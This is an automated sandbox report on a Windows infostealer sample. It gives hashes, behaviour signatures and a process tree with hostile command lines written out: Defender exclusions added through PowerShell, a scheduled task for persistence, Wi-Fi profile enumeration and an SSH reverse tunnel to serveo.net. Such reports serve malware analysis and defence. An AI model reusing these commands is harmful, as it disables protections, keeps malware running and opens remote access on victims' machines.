Analysis

  • max time kernel
    142s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-02-2024 15:16

General

  • Target

    7e9a93c69aecfc2bbda9470fbd4556db.exe

  • Size

    14KB

  • MD5

    7e9a93c69aecfc2bbda9470fbd4556db

  • SHA1

    ab0e810472a897affac1a761b49595939f6897a9

  • SHA256

    82e68bb4f56181a0b2458f2861aa7b5fa1bb0f4ce30907d579c3b92707ef2647

  • SHA512

    59abfa455c148c88959f992864de627857e950d9abb36b49efd979da4139a50847932d9577d658d0d793802ef5a6f6b91520440af2ff983dbf04126cf909d342

  • SSDEEP

    384:1R8wtU1eai/zbM/XygkxOu6cyhLWi1fXlSW:1eCU1vi7blHhyhiij

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7e9a93c69aecfc2bbda9470fbd4556db.exe
    "C:\Users\Admin\AppData\Local\Temp\7e9a93c69aecfc2bbda9470fbd4556db.exe"
    1⤵
    • UAC bypass
    • Checks computer location settings
    • Checks whether UAC is enabled
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:2024
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7e9a93c69aecfc2bbda9470fbd4556db.exe'; Add-MpPreference -ExclusionProcess '7e9a93c69aecfc2bbda9470fbd4556db'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\Admin'"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:112
    • C:\Users\Admin\AppData\Local\Temp\nklqjk3b.jqt.exe
      "C:\Users\Admin\AppData\Local\Temp\nklqjk3b.jqt.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1652
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "nklqjk3b.jqt" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\RobloxSecurity\nklqjk3b.jqt.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\nklqjk3b.jqt.exe" &&START "" "C:\Users\Admin\AppData\Local\RobloxSecurity\nklqjk3b.jqt.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1080
        • C:\Windows\system32\chcp.com
          chcp 65001
          4⤵
            PID:3256
          • C:\Windows\system32\timeout.exe
            timeout /t 3
            4⤵
            • Delays execution with timeout.exe
            PID:3912
          • C:\Windows\system32\schtasks.exe
            schtasks /create /tn "nklqjk3b.jqt" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\RobloxSecurity\nklqjk3b.jqt.exe" /rl HIGHEST /f
            4⤵
            • Creates scheduled task(s)
            PID:4432
          • C:\Users\Admin\AppData\Local\RobloxSecurity\nklqjk3b.jqt.exe
            "C:\Users\Admin\AppData\Local\RobloxSecurity\nklqjk3b.jqt.exe"
            4⤵
            • Executes dropped EXE
            • Accesses Microsoft Outlook profiles
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            • outlook_office_path
            • outlook_win_path
            PID:3512
            • C:\Windows\SYSTEM32\cmd.exe
              "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:432
              • C:\Windows\system32\chcp.com
                chcp 65001
                6⤵
                  PID:3888
                • C:\Windows\system32\netsh.exe
                  netsh wlan show profiles
                  6⤵
                    PID:2944
                  • C:\Windows\system32\findstr.exe
                    findstr /R /C:"[ ]:[ ]"
                    6⤵
                      PID:1808
                  • C:\Windows\SYSTEM32\cmd.exe
                    "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2404
                    • C:\Windows\system32\chcp.com
                      chcp 65001
                      6⤵
                        PID:904
                      • C:\Windows\system32\netsh.exe
                        netsh wlan show networks mode=bssid
                        6⤵
                          PID:3988
                        • C:\Windows\system32\findstr.exe
                          findstr "SSID BSSID Signal"
                          6⤵
                            PID:624
                        • C:\Windows\System32\OpenSSH\ssh.exe
                          "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:2237 serveo.net
                          5⤵
                            PID:3616
                  • C:\Users\Admin\AppData\Local\RobloxSecurity\nklqjk3b.jqt.exe
                    C:\Users\Admin\AppData\Local\RobloxSecurity\nklqjk3b.jqt.exe
                    1⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3240
                  • C:\Users\Admin\AppData\Local\RobloxSecurity\nklqjk3b.jqt.exe
                    C:\Users\Admin\AppData\Local\RobloxSecurity\nklqjk3b.jqt.exe
                    1⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3588

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\4cn9n9irdf\p.dat

                    Filesize

                    4B

                    MD5

                    b166b57d195370cd41f80dd29ed523d9

                    SHA1

                    fc15481319490c30a42e4dccfca757cc57193312

                    SHA256

                    7e62ce15499878ca883e552b485ccc2f5dc86c7664c4446cc7f99a247f3f0ae1

                    SHA512

                    813b0dfb3f08c93cb986df72be08493ac845e23601e8a2332140a72ab10fb5d41912f4925912d6d39b8493658fd062790eea642eca846f33d41f56d98d5ddd18

                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\nklqjk3b.jqt.exe.log

                    Filesize

                    847B

                    MD5

                    3308a84a40841fab7dfec198b3c31af7

                    SHA1

                    4e7ab6336c0538be5dd7da529c0265b3b6523083

                    SHA256

                    169bc31a8d1666535977ca170d246a463e6531bb21faab6c48cb4269d9d60b2e

                    SHA512

                    97521d5fb94efdc836ea2723098a1f26a7589a76af51358eee17292d29c9325baf53ad6b4496c5ca3e208d1c9b9ad6797a370e2ae378072fc68f5d6e8b73b198

                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i1ugc423.3oy.ps1

                    Filesize

                    60B

                    MD5

                    d17fe0a3f47be24a6453e9ef58c94641

                    SHA1

                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                    SHA256

                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                    SHA512

                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                  • C:\Users\Admin\AppData\Local\Temp\nklqjk3b.jqt.exe

                    Filesize

                    128KB

                    MD5

                    869f82df0992dc2f5155d8f69fd1c9cf

                    SHA1

                    5b48d32aca1f7705c03e2bd592f68a2b9c9a7a22

                    SHA256

                    d77412b72a893ee96e82d7efbd9fc2612176da00df5ebc066c13c303f558bcc9

                    SHA512

                    b0f0e7f6354b64cac887600690531ba93f8aeb79e746fb9848c5f16f09931e3d8b5c2ad2a617fb9c978020450b4f717f9485d468b9c6098e6f319a59b26fad19

                  • memory/112-43-0x0000000007470000-0x000000000747E000-memory.dmp

                    Filesize

                    56KB

                  • memory/112-10-0x0000000005880000-0x00000000058E6000-memory.dmp

                    Filesize

                    408KB

                  • memory/112-6-0x00000000025F0000-0x0000000002600000-memory.dmp

                    Filesize

                    64KB

                  • memory/112-7-0x0000000005050000-0x0000000005678000-memory.dmp

                    Filesize

                    6.2MB

                  • memory/112-8-0x0000000005680000-0x00000000056A2000-memory.dmp

                    Filesize

                    136KB

                  • memory/112-9-0x0000000005720000-0x0000000005786000-memory.dmp

                    Filesize

                    408KB

                  • memory/112-46-0x0000000007560000-0x0000000007568000-memory.dmp

                    Filesize

                    32KB

                  • memory/112-4-0x00000000025B0000-0x00000000025E6000-memory.dmp

                    Filesize

                    216KB

                  • memory/112-20-0x0000000005B20000-0x0000000005E74000-memory.dmp

                    Filesize

                    3.3MB

                  • memory/112-21-0x0000000005F10000-0x0000000005F2E000-memory.dmp

                    Filesize

                    120KB

                  • memory/112-22-0x0000000005F50000-0x0000000005F9C000-memory.dmp

                    Filesize

                    304KB

                  • memory/112-49-0x0000000074490000-0x0000000074C40000-memory.dmp

                    Filesize

                    7.7MB

                  • memory/112-24-0x000000007F5C0000-0x000000007F5D0000-memory.dmp

                    Filesize

                    64KB

                  • memory/112-25-0x00000000064F0000-0x0000000006522000-memory.dmp

                    Filesize

                    200KB

                  • memory/112-26-0x000000006FA40000-0x000000006FA8C000-memory.dmp

                    Filesize

                    304KB

                  • memory/112-36-0x00000000064B0000-0x00000000064CE000-memory.dmp

                    Filesize

                    120KB

                  • memory/112-37-0x00000000070F0000-0x0000000007193000-memory.dmp

                    Filesize

                    652KB

                  • memory/112-38-0x0000000007860000-0x0000000007EDA000-memory.dmp

                    Filesize

                    6.5MB

                  • memory/112-39-0x0000000007220000-0x000000000723A000-memory.dmp

                    Filesize

                    104KB

                  • memory/112-40-0x0000000007290000-0x000000000729A000-memory.dmp

                    Filesize

                    40KB

                  • memory/112-45-0x0000000007580000-0x000000000759A000-memory.dmp

                    Filesize

                    104KB

                  • memory/112-42-0x0000000007420000-0x0000000007431000-memory.dmp

                    Filesize

                    68KB

                  • memory/112-23-0x00000000025F0000-0x0000000002600000-memory.dmp

                    Filesize

                    64KB

                  • memory/112-44-0x0000000007480000-0x0000000007494000-memory.dmp

                    Filesize

                    80KB

                  • memory/112-41-0x00000000074A0000-0x0000000007536000-memory.dmp

                    Filesize

                    600KB

                  • memory/112-5-0x0000000074490000-0x0000000074C40000-memory.dmp

                    Filesize

                    7.7MB

                  • memory/1652-69-0x000002F6B8290000-0x000002F6B82A0000-memory.dmp

                    Filesize

                    64KB

                  • memory/1652-64-0x000002F69DC30000-0x000002F69DC54000-memory.dmp

                    Filesize

                    144KB

                  • memory/1652-66-0x00007FF8A7210000-0x00007FF8A7CD1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/1652-73-0x00007FF8A7210000-0x00007FF8A7CD1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/2024-50-0x0000000074490000-0x0000000074C40000-memory.dmp

                    Filesize

                    7.7MB

                  • memory/2024-51-0x0000000004B10000-0x0000000004B20000-memory.dmp

                    Filesize

                    64KB

                  • memory/2024-52-0x0000000005CC0000-0x0000000005CCA000-memory.dmp

                    Filesize

                    40KB

                  • memory/2024-3-0x0000000004B80000-0x0000000004C12000-memory.dmp

                    Filesize

                    584KB

                  • memory/2024-67-0x0000000004B10000-0x0000000004B20000-memory.dmp

                    Filesize

                    64KB

                  • memory/2024-68-0x0000000074490000-0x0000000074C40000-memory.dmp

                    Filesize

                    7.7MB

                  • memory/2024-2-0x0000000005130000-0x00000000056D4000-memory.dmp

                    Filesize

                    5.6MB

                  • memory/2024-0-0x0000000000160000-0x000000000016A000-memory.dmp

                    Filesize

                    40KB

                  • memory/2024-1-0x0000000074490000-0x0000000074C40000-memory.dmp

                    Filesize

                    7.7MB

                  • memory/3240-85-0x00007FF8A7210000-0x00007FF8A7CD1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/3240-87-0x000001ECD6430000-0x000001ECD6440000-memory.dmp

                    Filesize

                    64KB

                  • memory/3240-88-0x00007FF8A7210000-0x00007FF8A7CD1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/3512-78-0x00007FF8A7210000-0x00007FF8A7CD1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/3512-79-0x00000216B5EE0000-0x00000216B5EF0000-memory.dmp

                    Filesize

                    64KB

                  • memory/3512-86-0x00007FF8A7210000-0x00007FF8A7CD1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/3512-89-0x00000216B5EE0000-0x00000216B5EF0000-memory.dmp

                    Filesize

                    64KB

                  • memory/3588-91-0x00007FF8A7210000-0x00007FF8A7CD1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/3588-92-0x00000199A6330000-0x00000199A6340000-memory.dmp

                    Filesize

                    64KB

                  • memory/3588-93-0x00007FF8A7210000-0x00007FF8A7CD1000-memory.dmp

                    Filesize

                    10.8MB